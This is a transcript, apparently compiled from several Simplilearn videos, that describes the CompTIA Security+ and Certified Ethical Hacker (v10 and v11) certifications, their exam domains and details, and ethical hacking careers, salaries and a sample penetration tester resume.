So now that you know what the CompTIA Security+ certification is about, let us look at a few points as to why a professional must choose this certification. The first reason being, it's a vendor-neutral certification. The CompTIA Security+ certification is vendor neutral, which implies that you don't have to center on the technology and security of a precise vendor. The skills and knowledge achieved through this certification make security professionals and network administrators in demand in the IT marketplace. The CompTIA Security+ certification is globally acknowledged to be one of the fundamental security certifications in the field of cyber security; CompTIA Security+ certification is universally recognized and trusted across the world. Security+ provides hands-on skills: it is one of the few entry-level cyber security certifications that emphasizes hands-on practical skills. This ensures a security professional is better prepared to solve several complex issues of the current times. The CompTIA Security+ certification is aligned with the latest techniques and trends; it covers core technical skills in risk assessment and management, incident response, forensics and cloud operations, to name a few, thereby ensuring high performance on the job.

Having this security certification provides you a wider breadth of career opportunities. The CompTIA Security+ exam is performance based, which makes the knowledge and skills learned more applicable. There are numerous job roles that turn to Security+ to supplement baseline cyber security skills. Cyber security professionals are in demand by organizations from both private and public areas. With this certification you can take up jobs related to compliance and operational security, threats and vulnerabilities, access control and identity management, and cryptography, to name a few. It is also to be noted that professionals with the Security+ certification have greater opportunities of receiving higher salaries than non-certified professionals. Another benefit of this certification is that if you wish to get a cyber security government job, obtaining the CompTIA Security+ certification will be an ideal starting point for you.

So now that you know the perks of achieving this certification, what do you have to do to achieve this? Well, before you can achieve this certification you have to clear the CompTIA Security+ exam. Let us now have an overview of the CompTIA Security+ exam.

First and foremost, who can take up this exam? Although CompTIA does not have any set prerequisites, organizations recommend that candidates meet these two criteria. Let's have a look at the two criteria. Firstly, the CompTIA Security+ is for IT professionals who carry a minimum of two years of experience in IT administration focusing on security. The CompTIA Security+ is ideal for professionals who are looking to start or advance a career in security. Obtaining this certification prepares professionals for job roles like system administrator, security administrator, network administrator, junior penetration tester, security engineer and security consultant, to name a few. Though CompTIA Security+ is an entry-level certification, it is strongly recommended that you get the A+ and Network+ credentials before proceeding to the Security+ certification. This will ensure that you have the required technical skills, like configuring, managing and troubleshooting networks.

Now let's move on and understand the CompTIA Security+ exam details. CompTIA Security+ SY0-601 is the latest exam code that was launched on 12 November 2020. The SY0-501 English language exam retires on 31st July 2021, hence we recommend you opt for the SY0-601 exam. There are a maximum of 90 questions. The CompTIA Security+ exam has multiple-choice questions, but some CompTIA certification exams include performance-based questions, or PBQs. Performance-based questions test a candidate's ability to solve problems in a simulated environment. The passing score for this certification exam is 750 on a scale of 100 to 900. The duration of the exam is 90 minutes, so time management is crucial to clear the exam, since you need to solve each question within a minute. The CompTIA Security+ SY0-601 exam is currently available in English and Japanese. You can enroll for the exam by booking a slot online or registering with Pearson VUE testing centers. The price of the CompTIA Security+ certification exam is 370 US dollars; in Australia the price is 500 Australian dollars, and in European currency it is 334 euros.

Let us now look at the focus areas of the CompTIA Security+ exam. Firstly, this exam focuses on the core cyber security skills required of any cyber security role, such as security incident handling and response, intrusion detection, malware prevention, etc. The second area of focus is threats, attacks and vulnerabilities; this includes analyzing indicators of compromise and determining types of malware, or comparing and contrasting types of attacks. Next up we have identity and access management; this topic emphasizes implementing identity and access management controls or differentiating common account management practices. The fourth domain that CompTIA Security+ focuses on is risk management; this domain describes the importance of policies, plans and procedures related to organizational security. Finally we have cryptography and PKI; here the exam deals with questions related to comparing and contrasting basic concepts of cryptography and implementing public key infrastructure. Another key focus area of this exam is how to troubleshoot common security issues and deploy mobile devices securely.

Now coming to the final section of this video, where we look at the important skills that you will acquire after completing the CompTIA Security+ certification exam. First, you will learn to detect various types of compromise and understand penetration testing and vulnerability scanning concepts. This certification will give you the knowledge to assess the security posture of an enterprise network and recommend and implement appropriate security solutions. You will also get an idea of installing, configuring and deploying network components while assessing and troubleshooting issues to support organizational security. You will gain the desired skills to monitor and secure hybrid environments, including cloud, mobile and IoT. The CompTIA Security+ certification exam gives the experience to install and configure identity and access services. You will understand how to identify, analyze and respond to security events and incidents. Finally, you will grab another crucial skill, that is to implement best practices in risk management. CompTIA Security+ certification will make you understand how to implement and summarize the risk management best practices and the business impact; it ensures you operate with an awareness of applicable laws and policies, including the principles of governance, risk and compliance.

That was all about the CompTIA Security+ exam. Taking up this exam will help you learn a lot about cyber security and acquire the necessary skills that will help you become a greater cyber security professional. This is why organizations look for professionals with CompTIA certification; this certification is evidence of your expertise in the security field. CompTIA Security+ certification is prevalent among security professionals. Although the exam requires a lot of hard work to crack, the reward is very fruitful. All the best to everyone who wishes to

Be comptia security plus certified now let’s begin with who is a certified ethical hacker a certified ethical hacker is a person who is also known as ethical hacker an ethical hacker is just the opposite of a hacker a hacker is a person who with malicious intent tries to misuse vulnerabilities that they have

Identified in an organization structure and then gain access to unauthorized data whereas an ethical hacker does the same thing they try to locate the weakness they try to look at the vulnerabilities and they see how they can be misused however the intent is completely different and that is what

Differentiates a hacker from an ethical hacker hacker would be a criminal with a malicious intent who would try to misuse and personally gain by doing criminal activity from that particular activity that they have done whereas a ethical hacker would try to help the organization in an authorized manner so

That’s where the permission comes into the picture the ethical hacker has permission from the organization to conduct some activity that would identify vulnerabilities or weaknesses in the information technology structure of that organization and then once they have been identified the ethical hacker would then help the organization to plug

Those vulnerabilities rather than misuse those vulnerabilities so any person who completes ch version 10 certification is known as a certified ethical hacker so there’s a certification once you complete that once you pass the exams you can essentially call yourself as a certified ethical hacker and you’re

Going to get a certificate with the same terminology so as you can see in the diagram your responsibility would be as a certified ethical hacker would be with the proper permission of the organization with the authorization coming in with contracts coming in you would legally help the organization to identify those weaknesses and

Vulnerabilities and once you find them you’re going to report them to the organization and you’re going to help the organization with remediation plan which will help them remediate mitigate and resolve the vulnerabilities that you’ve identified thus making the organization’s security structure a lot better based on which black hat hackers

or malicious hackers would be unable to attack the organization.

So what is CEH version 10? Now, this course was initially introduced in September 2015, and I think if you look at the versioning, this is the 10th version that is there in the market. So essentially CEH, or the Certified Ethical Hacker course, has been in the industry for a long time; it is a very well accepted and well-renowned course. The current version, as it is, was introduced in September 2015 and is one of the toughest certifications in the cyber security field. This includes a lot of information that you have to learn, that you have to know, before you can attempt the certification. You will master all the ethical hacking methodologies that are used in penetration testing and ethical hacking situations. What does that mean? That means that CEH version 10 is a structured course that will help you look at all the phases that are used in ethical hacking, all the terminologies that are utilized, all the tools that are utilized, in such a manner that you can do a penetration test or a vulnerability assessment and identify and test the vulnerabilities for their complexity. Once you complete the course, you would have mastered all the ethical hacking techniques that are required.

There are two exams: one is a written exam and the other is a practical exam, and you can opt for either. The written exam is basically a multiple choice question exam where they will ask you scenario-based questions and you have to answer those questions; that is something we are going to look into during this video. The practical exam is basically a simulation exam where they give you a scenario and you have to complete those tests and prove that you are a good ethical hacker based on the report that you give. If the report tallies with what the test was, you would be clearing that exam. So the practical exam is a little bit tougher; it is more hands-on, and it tests the actual skills that you would perform in a hacking scenario or an ethical hacking scenario. Thus the practical exam is going to be that

much tougher. The written exam, to give it credence, tests you a lot on your mentality, on your thought process, on your judgment characteristics. So they will give you a scenario and ask you: what do you think is happening, what does this attack trend amount to, or what would then be the next step in the particular attack that they are describing? So it is more of an intellectual test, where your thought process is being checked when you are giving this exam.

So what would be the difference between these exams? In a practical exam you would be conducting all those steps yourself and you would be reaching a conclusion; so here, essentially, you are being tested on the skills that you have developed, on the execution part of it, to see whether you can execute a test end to end. Whereas in a written exam you will be put in the middle of a test, where you have to assume something, where you have to understand what steps would have been performed in the previous stages and what the expected result would be, and you are supposed to analyze that and then come to the correct answer.

So if there is a question of which exam is better, written or practical, the answer to that is: from an intellectual perspective, a written exam would be a lot tougher than a practical exam, and from an execution perspective, a practical exam would be tougher than a written exam. So it depends on us which exam we want to give. Both of them are widely accepted and well respected in the information security field, so it is just the option that we choose, which exam we want to give.

Now, this course, the version 10 course, is purely an attack-based course. Okay, it is an offensive course; there are no defensive mechanisms. So if you are looking for answers to questions like how to secure yourself on the internet, how to securely configure an operating system, how to securely configure a server, or how to configure a firewall, this is not the certification. This basically talks about attacking those devices. So if you come across a firewall, how would you test the firewall, how would you identify vulnerabilities in it, and how would you bypass the firewall? Similarly, if you come across a server, how are you going to attack and hack the server, be it Windows or Linux based? So this basically becomes an attack-based course; you are looking at offensive mechanisms over here and not defensive ones at all.

So what is new in this version? In this version there is a new module for IoT, the Internet of Things. It focuses on emerging attack vectors like cloud, artificial intelligence and machine

learning. It basically talks about smart devices, and it talks about the vulnerabilities and the risks that smart devices face in today's world. For example, it will tell you about the industries that are utilizing all these smart devices, why they are utilizing them, what kind of devices they are utilizing, and what the risks within those devices are. It will also give you a lot of tools for you to practice with to identify such IoT devices. What would constitute an IoT, or Internet of Things, device? Any device which has an IP address, can connect to the internet and creates data. So even your smart watch, your smartphone, your cars that have internet connectivity nowadays, your Google Homes, Amazon Alexas, all of these devices would come under the IoT umbrella.

And have you ever wondered about sitting at home, having Wi-Fi, having all of these devices, even a smart TV if you will, connected to the Wi-Fi, and have you ever questioned how a hacker would then be able to access your home through all of these devices, record information and basically just spy on you? Similarly, an organization that is utilizing IoT would be vulnerable to the same vulnerabilities, and this course does include IoT security to a certain extent, where we talk about vulnerabilities and how to identify those vulnerabilities in IoT.

Then there is a new vulnerability analysis module, where it gives you risk assessment, it talks about the CVSS scoring system, and it talks about how to do a vulnerability management program in the first place: what are the steps required in a vulnerability management program, how should it be repeatable and how should it be measurable as a program, and what should the outcome be? So basically it will give you a structured way of how to do a vulnerability management assessment and how you want to achieve the end goal, thus leading you to a penetration test.

So all the modules are leveled up. What do we mean by leveled up? That means they have been updated to the latest tools, latest standards and latest technologies. So you have got cryptographic attacks, you have got attacks on applications like SQL injection, we will be talking about packet sniffing using various tools; all of these are upgraded, which means they are up to date with the latest operating systems. So even when we do this course you will be looking at operating systems like Windows 10, Windows 8, Windows Server 2012, Windows Server 2016, Kali Linux machines, Android machines and Ubuntu desktop as well. So all of the operating systems are the latest, the tools are the latest, and you will be interacting with these tools. And then there is a mobile security toolkit as well, which will help you do a

penetration test on a mobile device. So these are what is new in version 10.

Now let's talk about the roles and responsibilities that an ethical hacker should have when they actually go into the world. Now, what are the responsibilities, the roles, what are the capabilities that we should have? We should be able to look at scripts that would test for vulnerabilities. So, for example, a SQL injection attack is a script-based attack; let's say a cross-site scripting attack, that again is going to be a script-based attack. So maybe we want to go ahead a little bit, look at Windows systems and do a PowerShell attack, and know a little bit about PowerShell scripting. If you look at Linux, there is a Bash shell where there is Bash scripting, and you will want to learn that scripting as well. Now, the course doesn't include all these scripting languages, but it does help you understand what these scripting languages are, and it does have some basic introduction to how these languages can be utilized to create those scripts.

Then we also want to develop tools to increase security. You want to look at those commands that are utilized on all operating systems; you want to look at the capabilities of the operating systems, of how to create security parameters and ensure the operating systems, applications and devices are secure. You should be able to perform a risk assessment. Now, when you say risk assessment, risk assessment is the likelihood of an attack actually being executed on an organization based on the threats and the vulnerabilities that we have identified. So risk assessment is something that you find out from a vulnerability, and then you try to figure out, in a hypothetical manner, what the likelihood is of that vulnerability being exploited by a hacker if they find it, and if they do execute that, what the impact on the organization is going to be, and what the penalties or the repercussions are that the organization is going to face if that vulnerability is exploited. That is what a risk assessment is.

Then we should also be able to develop or set up security policies and implement them, to ensure that the security mechanisms are standardized and consistent. And then we should also look at training staff in network security, to ensure that they are aware of these vulnerabilities and they know what their responsibilities are to maintain some semblance of security in the organization.

So why do we want to become a Certified Ethical Hacker? Now, since you are watching this video, it is easy to assume that we are all interested in security, we are all interested in hacking, but hacking by itself is not a real job. For us to get a job in the

industry on a security parameter, or an information security parameter, we want to become a Certified Ethical Hacker. So if you look at the popular hacking cases that have happened: in the 1990s there was a national crackdown on criminals; the Microsoft NT operating system was hacked. Now, this was back in the 90s, when security wasn't that evolved, and there were a lot of attacks back then that crippled infrastructure, that crippled banks, when they started realizing that computing isn't as easy as it seems. Of course, if you use a computer the functionality is always there, but if the functionality is not properly configured you are just exposing yourself to cyber criminals, where they are going to steal information and your organization may just go bankrupt because of that.

In 2013, as an example, Adobe reported 2.9 million accounts as stolen. In 2016, Kaspersky, which is an internet security firm, announced that there were 758 million malicious attacks that occurred worldwide. Imagine that: 758 million malicious attacks that were identified and reported. In 2018, Facebook reported a loss of 30 million accounts that were stolen. In 2018 again, Quora reported 100 million customer accounts being stolen, and in 2018 again, Marriott: 500 million travelers' accounts stolen and manipulated.

Now, when you see accounts being stolen, how does it affect the organizations? Now, first and foremost, if those accounts were stolen, that means usernames and passwords were cracked, and those accounts may have contained credit card information or may have contained some personal information that would identify the person, and thus make them gullible to a social engineering attack or an identity theft attack. So it has a cascading effect. If I had been affected, or you had been affected, by these attacks, the repercussions would have been catastrophic: your credit card information being stolen means somebody else would have misused it and you would have seen a huge bill come your way. Now, you can go back to the bank and dispute that, but that is again a dispute that you are trying to have with the bank for something that you didn't do, which requires a lot of energy and a lot of time, and at the end of it somebody has to pay for that particular loss. Now, in this scenario the bank would have had to bear the loss, but then that's a loss for the bank, and the bank doesn't want to do that, and that's where they would try to hire Certified Ethical Hackers who try to test for these vulnerabilities and plug them, so that the end consumer is also secured and the bank is also secured, right?

In this case, Marriott, there were 500 million travelers' accounts that were stolen; a lot of credit card information was leaked out, email accounts were hacked and compromised, and thus there was a lot of replication that happened. Now, the thing is that there are also laws that these organizations need to adhere to, that tell the organizations how to keep their information secure and also have penalties in place if the organization gets hacked, and the penalties are pretty severe. So organizations do not want to get hacked or compromised, not only from the customer's perspective, where they would be losing customers, losing reputation and thus facing losses, but also from a legislative perspective, where they would have to pay fines to the government for the frauds that have happened. So these are some of the popular hacking cases that have cost these organizations quite a lot of money, and thus they have a lot of security in mind.

If you look at the news, in BBC News there was something reported from the French police, that there was a virus that infected more than 850,000 computers worldwide. Now, on similar lines, if you remember ransomware, and if you look at WannaCry, that happened in 2017 or 2018, it also cost the world 4 billion dollars in losses during just that one small month of its infection. Then Apple and Google basically disclosed that a large-scale hacking effort was targeted at Apple devices, and it has been reported that there was a sustained effort to hack iPhones over a period of at least two years, which means that there is a specific target towards Apple consumers and they are at a higher risk of getting hacked than others. Then Texas government organizations were hit by a ransomware attack: hackers have infected 23 organizations connected to local government in the US state of Texas with ransomware. That means that their databases have been encrypted, the government themselves do not have access to that database, the databases could have been compromised by the hackers, and that means that whatever services were being provided to the users based on that database may no longer be available to the end users because of the ransomware.

Now, moving on with these, why

do we want to become a Certified Ethical Hacker? Increased attacks lead to more job openings. Now, if you look at ransomware, the WannaCry attack that happened in 2017, there was a knee-jerk reaction given by the rest of the world for IT security: suddenly budgets started opening up, suddenly people wanted more ethical hackers on their payrolls to test for vulnerabilities. In the UK and Europe we have GDPR, which is again another law that imposes severe penalties on organizations that get hacked and for not having proper security and a vulnerability assessment and penetration testing program in place. So that leads to a lot of job requirements as well, where organizations look for people with this special skill set to help them mitigate the vulnerabilities, to safeguard them and their customers from hackers and also from penalties from law enforcement and governments. So thus the demand keeps on increasing for ethical hackers, which automatically means that the salaries are going to increase as well. So the more the demand and the lesser the supply, the higher the salaries; that's plain economics.

Then, challenging hackers with malicious intent: from an ethical hacker's perspective it is our duty to safeguard an organization, which means that we will be pitched against hackers, and we have to ensure that those hackers would be challenged to the maximum limit before they even try to get access to any of the resources that we are trying to protect. It offers a boost in your career: the more effort you put in and the more vulnerabilities you find, the better the career prospects that you have and the better the job aspects that you are going to get. And this also lets you keep yourself updated on the latest technology: as technology progresses, as we evolve on technology, security will also evolve, and the ethical hacker would need to keep themselves updated on these technologies.

Let us understand the importance of the CEH certification before getting to know about its content. So why should you take up CEH version 11? The Certified Ethical Hacker is the most trusted ethical hacking certification and a recommended one by employers around the globe.

Since the introduction of the CEH certification in 2003, it is globally recognized as a standard within the information security field. CEH version 11 by EC-Council continues to keep up to the standard; it familiarizes you with the latest hacking techniques and teaches you the advanced hacking tools and exploits used. CEH version 11 aligns with the current cyber security market requirements and adds the latest advancements in the cyber security field. The CEH certification helps and trains you to think like a hacker, and this in turn helps you beat a hacker and defend your network. After obtaining the CEH certification you will be a Certified Ethical Hacker. A Certified Ethical Hacker is a skilled professional working in a red team environment who safeguards networks, understands attack strategies and mimics the skills of malicious hackers. Certified Ethical Hackers discover vulnerabilities in a system and operate with permission from the system owners only.

So who can become a Certified Ethical Hacker, and who can take up the CEH certification? Let us have a look at that now. In the first case, to be eligible for the CEH certification exam you need to attend the official training from authorized EC-Council training partners. It can be online training or tutor-led training from EC-Council learning partners; only then are you eligible to take up the CEH certification exam. So a candidate who has completed an official EC-Council training is eligible to take up the exam without going through the application process. Or, in the second case, in order to be considered for this credential you need to have at least two years of work experience in the information security domain, and you must pay a non-refundable application fee and submit an eligibility application form. Once it is approved, you can take up the CEH exam: after the application is approved you can purchase the test voucher.

In the latest version of the CEH we will see the addition of various core concepts. Moving on to our next topic, let us see how different CEH version 11 is and a few of its objectives. Firstly, it outlines ethical hacking concepts, cyber kill chain concepts and an

overview of information security and various laws and regulations related to information security. This certification briefs you about the phases of system hacking, attacking techniques and how you can maintain access. It also briefs you about footprinting concepts and ways of utilizing footprinting tools, along with the necessary countermeasures. The next objective is to familiarize you with vulnerability assessment, along with hands-on experience of various scanning tools. Next we have cyber security threats like malware threats: analysis of various worms, viruses and Trojans, various malware concepts, and packet sniffing concepts and techniques have been introduced into this domain. It also highlights the concepts related to social engineering, denial of service attacks, SQL injection and evasion techniques. It also speaks about wireless hacking concepts and mobile device management; the concept of operational technology is a new addition this time. Next is getting acquainted with security solutions like firewalls, honeypots and IPS, their evasion and protection. Our fifth point is knowing various topics in cryptography, like encryption algorithms, public key infrastructure and cryptanalysis. Moving on, the next objective is to incorporate Parrot Security OS, as it offers better performance on lower-powered laptops and machines when compared to Kali Linux. Next is to learn to recognize and deal with IoT-based vulnerabilities and attacks; with the CEH version 11 course, which covers the latest IoT hacking tools, you would be required to ensure the safety of IoT devices. Our next point is with respect to the evolving cloud industry: you would need to learn how to identify and defend against cloud-based threats and attacks. The latest version of CEH includes new operating systems, and Windows 10 configured with a domain controller and vulnerable web applications for improving hacking skills. Finally, what is different is that more than 50 percent of the CEH version 11 course is dedicated to practical skills in live ranges via EC-Council labs; EC-Council leads in this aspect of the industry.

Now that we saw the CEH exam objectives, let us look into the CEH exam topics' weightage. As you see on your screens, this is a pie chart with the nine domains in CEH along with their weightages; you can prepare for your exam accordingly. Let us move on and take a closer look at

each of these domains, their respective subdomains and their descriptions.

Our first domain is Information Security and Ethical Hacking Overview. This domain consists of questions from information security, cyber kill chain concepts, ethical hacking concepts, various hacking concepts, and information security laws and standards. You can expect a total number of eight questions from this domain; the weightage of this section is six percent.

The second domain is Reconnaissance Techniques. Under the subdomains we have footprinting and reconnaissance at first; this covers various topics like footprinting concepts, footprinting methodology, email footprinting, footprinting through web services, DNS footprinting, footprinting through social engineering, etc. The next subdomain in this section is scanning networks. Scanning networks covers various concepts like scanning tools, host discovery, port and service discovery, OS discovery, drawing network diagrams, scanning beyond IDS and firewall, etc. And our third subdomain under reconnaissance techniques is enumeration: various topics like SNMP enumeration, NTP and NFS enumeration, SMTP and DNS enumeration, and enumeration countermeasures are covered under this subdomain. A total of 26 questions will be asked from this domain: under footprinting and reconnaissance you will have 10 questions, under scanning networks another 10, and finally under enumeration you will have 6 questions. A total weightage of 21 percent is given to this particular topic.

Our third domain is System Hacking Phases and Attack Techniques. Under our third domain, our first subdomain is about vulnerability analysis. This subdomain covers topics on vulnerability assessment, vulnerability classification, vulnerability assessment solutions and tools, and various vulnerability assessment reports. Our next subdomain is about system hacking; you have concepts like gaining access, cracking passwords, vulnerability exploitation, escalating privileges and maintaining access covered under this subdomain. And finally we have malware threats under this domain; malware threats incorporate concepts like APT concepts, Trojan concepts, virus and worm concepts, malware analysis and so on. A total of 21 questions will be asked from this domain: under vulnerability analysis there will be nine questions asked, system hacking another six questions, and finally under malware threats you will have six other questions asked. That sums up to a total of 21, with a weightage of 17 percent for this domain.

Our fourth domain is about Network and Perimeter Hacking. Here you have various subdomains, and one of them is social engineering. Under social engineering you will be asked questions based on social engineering techniques, insider threats, impersonation on social networking sites, identity theft and so on. You will also have various questions on the sniffing concepts, as it is another subdomain. You can also expect questions from the denial of service subdomain; here questions related to botnets and DDoS attacks will be asked. Various session hijacking concepts are another crucial part of this domain. The final subdomain is about evading IDS, firewalls and honeypots; here various concepts on IDS, IPS, firewalls and honeypots are covered. You will need to understand how to evade IDS and firewalls and how to detect honeypots. A total number of 18 questions will be asked from the fourth domain, that was network and perimeter hacking, and the weightage for this domain is 14 percent.

Our fifth domain is about Web Application Hacking, and our first subdomain in it is hacking web servers. This incorporates concepts related to web server attacks, web server attack tools, patch management and so on. The next subdomain is about hacking web applications; here you have various concepts related to bypassing client-side controls, analyzing web applications, footprinting web infrastructure, attacking access controls and how to perform injection attacks, and so on. Finally, under the SQL injection subdomain you will have questions based on SQL injection: the types of SQL injection, the SQL injection methodology, SQL injection tools, evasion techniques and SQL injection countermeasures. Here a total of 20 questions will be asked from this domain, and a weightage of 16 percent will be given to the web application hacking domain.

Our sixth domain is solely devoted to Wireless Network Hacking. This domain focuses on hacking wireless networks: various wireless concepts, wireless encryption, wireless threats, wireless hacking tools, various hacking methodologies, Bluetooth hacking and wireless countermeasures are covered. A total of eight questions will be asked from this domain, with a weightage of six percent.

Our seventh domain is all about Mobile Platform, IoT and OT Hacking. Our first subdomain here is hacking mobile platforms; here the concepts that are touched upon are mobile platform attack vectors, hacking Android OS, hacking iOS, mobile device management, and mobile security guidelines and tools. Our next subdomain here is about IoT and OT hacking, which covers concepts on IoT hacking tools, its methodologies and countermeasures, and it also speaks about OT concepts, OT attacks, OT hacking tools and OT countermeasures. You have a total of 10 questions asked from this domain, with a weightage of 8 percent.

The next domain is very interesting, and it is all related to cloud. The Cloud Computing domain covers concepts based on cloud computing, serverless computing, cloud computing threats, cloud hacking and cloud security. The weightage given to this domain is six percent, with a total number of questions of seven.

And finally we have Cryptography as our ninth domain. As the name suggests, this domain covers topics based on cryptography concepts, encryption algorithms, cryptography tools, public key infrastructure, email encryption, disk encryption, cryptanalysis and countermeasures, and seven questions will be asked from this domain, with a weightage of six percent.

Now that you saw the CEH exam topics' weightage, let us have a closer look at the CEH exam details. Let us first have a look at the CEH exam based on MCQs. The exam title is Certified Ethical Hacker, with the exam code of 312-50.

This exam will have 125 questions with a time limit of 4 hours. The test format is multiple choice questions. The pass percentage varies, ideally between 60 and 85 percent. Now let's have a look at the CEH practical exam details. In order to gain the CEH Master recognition, it is mandatory that you take up the CEH Practical exam as well. The exam title is Certified Ethical Hacker (Practical), and this practical exam will have 20 questions with a duration of 6 hours. The exam format will be the iLabs cyber range, and finally the passing score for the CEH Practical exam is 70 percent. After clearing both the MCQ-based exam and the practical exam, you can get the CEH Master recognition.

Now that we had a look at the CEH exam details, let us have a look at the career prospects for a professional with this certification. Having the CEH certification guarantees that you have an insight into the hacking world; hence companies want to hire professionals who can think like a hacker and safeguard their networks and systems. A candidate with the CEH certification can apply for various cyber security job roles, such as penetration tester, security engineer and information security analyst, from a long list. According to PayScale, the annual average salary of a CEH professional in India is 5 lakh rupees per annum, meanwhile in the United States a professional holding the CEH certification earns nearly 93,000 dollars on an average basis annually.

Now that you had a look at the CEH version 11 certification and its career prospects, what are you waiting for? Get certified with Simplilearn and bag that CEH certification.

With the increase in the number of cyber crimes across the globe, there is also an increase in the number of cyber security jobs, and the role of an ethical hacker tops the list. Hi guys,

This is shruti from simply learn and today i will run you through this video on ethical hacking career so let’s get started and explore the world of ethical hacking let’s begin with a few facts did you know that by the year 2021 there will be 3.5 million cyber security job

Openings that is a huge number isn’t it and also according to the u.s bureau of labor statistics there will be 28 increase in the number of jobs from 2016 to 2026 for information security analysts which includes ethical hackers this proves that there is a great demand

For ethical hackers at the moment as i mentioned earlier the number of cyber crimes across the world will increase as the digital era will only continue to grow organizations will be on the lookout to hire professionals who can fight these cyber crimes and protect the company’s data and to fight these cyber

Crimes we will require individuals who can think like a hacker and who is that well to do this job we have ethical hackers as you might be knowing an ethical hacker is trained to discover system vulnerabilities an ethical hacker is also known as a white hat hacker he

Or she is given authorization from the company to perform security assessments and at the end an ethical hacker would have to report the findings back to the company so that the vulnerabilities can be fixed an ethical hacker performs these security assessments with the help of various hacking techniques and tools

Let’s now move on to our next topic that is the steps to become an ethical hacker you might wonder how to start your ethical hacking career right well i will take you through that step by step firstly the candidate must have a computer science or an information technology bachelor’s degree it is also

Possible to become an ethical hacker without these degrees, provided you have the required skill sets and experience. The next requirement is that the candidate must have a minimum of two years of experience in the information security field. You have to start your career with a software or a networking job, and only then can you move on to the ethical hacking field. Coming to the certifications, it is necessary for the candidate to hold various cyber security certifications. Certifications play a vital role in the field of cyber security; your job opportunities can depend solely on these certifications. To become an ethical hacker, you can start off with foundational-level certifications such as the CCNA and CompTIA Security+.

Finally, the last step to become an ethical hacker is to clear the Certified Ethical Hacker examination. The CEH certification is provided by the EC-Council. It trains the candidate to protect a company’s network by using the same tools and methods that a hacker would use. The CEH exam has a duration of 4 hours and consists of 125 questions. If the candidate clears this exam, then he or she becomes a Certified Ethical Hacker.

Now that you know the steps to become an ethical hacker, let’s look into the skill sets required to help you achieve these steps. First and foremost, an ethical hacker needs to have in-depth knowledge of how operating systems work; knowledge of the Windows, Linux and Macintosh operating systems is required. For penetration testing, creating exploits and bug hunting, programming will be important, so knowledge of programming languages such as C, C++, HTML, Python and PHP will be very helpful. Basic knowledge of networking, TCP protocols and the OSI model is necessary, as networking is the foundation of cyber security. For securing databases, knowledge of SQL, NoSQL and PostgreSQL is necessary.

Cryptography is used to secure information; it is the process of converting data from a readable format to a non-readable format and vice versa. Cryptanalysis is decryption without the secret key. In most cases a certified ethical hacker would need to perform cryptanalysis, hence an ethical hacker has to be comfortable with both cryptography and cryptanalysis. Ethical hackers should also be proficient in network security control measures such as intrusion detection and intrusion prevention techniques. Now

let’s move on to the responsibilities taken care of by an ethical hacker. An ethical hacker is responsible for scanning systems for open and closed ports (using tools like ...) which can make the organization vulnerable to an attack, in addition to building and maintaining IDS, IPS and firewalls. They also try to evade these security measures to gauge the performance of the systems. A lot of the time, a company’s online fraud or online theft incidents are looked into by an ethical hacker. An ethical hacker also checks for network sniffing and hijacked web servers and applications. Those were the responsibilities of an ethical hacker.

Now let’s look into the various job roles an ethical hacker can apply for. It is a misconception that an ethical hacker will perform only penetration testing; there are a number of other jobs an ethical hacker can apply for, such as that of a penetration tester, information security analyst, security consultant and information security manager. Let’s have a look at each of these job roles one by one.

A penetration tester performs the typical responsibility of an ethical hacker, that is, he or she tries to exploit a security system’s vulnerabilities. This is carried out using different hacking tools and techniques. An ethical hacker can also apply for the role of an information security analyst. There is a difference between the job role of a penetration tester and that of an information security analyst: here the candidate will primarily be required to design and protect the organization’s network against various cyber attacks. Finally, the candidate is also required to document the identified security breaches so that they can be avoided the next time.

The responsibilities of a security consultant are more or less similar to those of an information security analyst. As a security consultant, you will be responsible for designing, implementing and maintaining various security architectures. In addition to this, you are also required to upgrade the security systems as and when required. Finally, an ethical hacker can also apply for the role of an information security manager. As the name suggests, this role requires the candidate to possess managerial skills, as an information security manager is responsible for heading the IT and information security teams.

Now that we have seen the responsibilities, the skills and the steps to become an ethical hacker, let’s have a look at the different companies hiring ethical hackers. To name a few, we have Bank of America, Ernst & Young, KPMG, UrbanPro and IBM. Let’s now look into the salary structure of an ethical hacker. In India, the average annual salary of a certified ethical hacker is nearly 4,76,000 rupees, and in the US the average annual salary of a certified ethical hacker is 91,000.

Now I will guide you through a sample resume of a penetration tester. As you can see on your screens, this is a sample resume of a penetration tester. We will look into this resume closely and understand what your resume should look like if you are applying for the role of a penetration tester. As always, you can start off with your name, your email ID and your phone number, followed by a brief summary of your current job profile. It is preferable to add your LinkedIn profile link here, and also your GitHub profile link if you have one.

As I mentioned earlier, this is a sample resume for a penetration tester, and hence we have to have more than two years of experience in the information security field. As you can see under the experience section, the candidate has two prior experiences, of which the first is that of a software tester and the second is that of a penetration tester. You would have to mention your latest or current experience at the beginning. You can mention your job role, the company and the duration, under which you can list out the various responsibilities you are currently looking into. If you are a penetration tester, you can mention responsibilities such as security monitoring, black box testing, documentation of the results, vulnerability scanning and so on. Below this you can mention your first company’s experience with the roles and responsibilities that you performed earlier. Here the candidate was a software tester before becoming a penetration tester.

Let’s move on to the education section. Here the candidate holds a bachelor’s degree in computer science; you can mention your degree followed by the university name. Whether you are applying for this role or for any other role in the cyber security domain, it is recommended that you list out the certifications as well. To start off with, a CCNA certification will be preferred, followed by a Certified Ethical Hacker certification, which is a must if you are applying for the role of a penetration tester. In addition to it, the Certified Expert Penetration Tester certification will also be a great advantage.

After mentioning the certifications, you can go ahead and mention your skill sets. Here we have technical skills and non-technical skills. Under technical skills you can mention the programming languages that you know; here we have C, C++, Java and Perl. You can also mention the operating systems that you have worked on, for example Windows, Linux and Unix. In addition to the programming languages and the OS, you can also mention the tools that you know, such as Nmap and Metasploit, which will be helpful if you are applying for the role of a penetration tester. Then you can also mention encryption technologies, knowledge of SQL, and bug tracking systems if you have worked on them before. If you have participated in a code audit, you can mention that here as well. Under non-technical skills, you can mention the various competitions you have taken part in, the games that you like and other extracurricular activities. Finally, you can also mention the projects undertaken. Under projects undertaken, you can talk about the various projects you have carried out in your company or outside it. Here we have two projects, one as a software test engineer and the second as a penetration tester.

So this is what the resume of a penetration tester looks like. Before jumping into the best books for ethical hacking, let’s speak a bit about cyber security. I’m sure you all already know what cyber security is, but here’s a refresher: cyber security refers to the practice of protecting networks, programs, computer systems and their components from unauthorized digital access and attacks. Did you know that, according to the University of Maryland, hackers attack every 39 seconds, that is, on average 2,244 times a day? Now that’s a huge number. Speaking of hacking, let’s define the term ethical hacking before diving into the books for it.

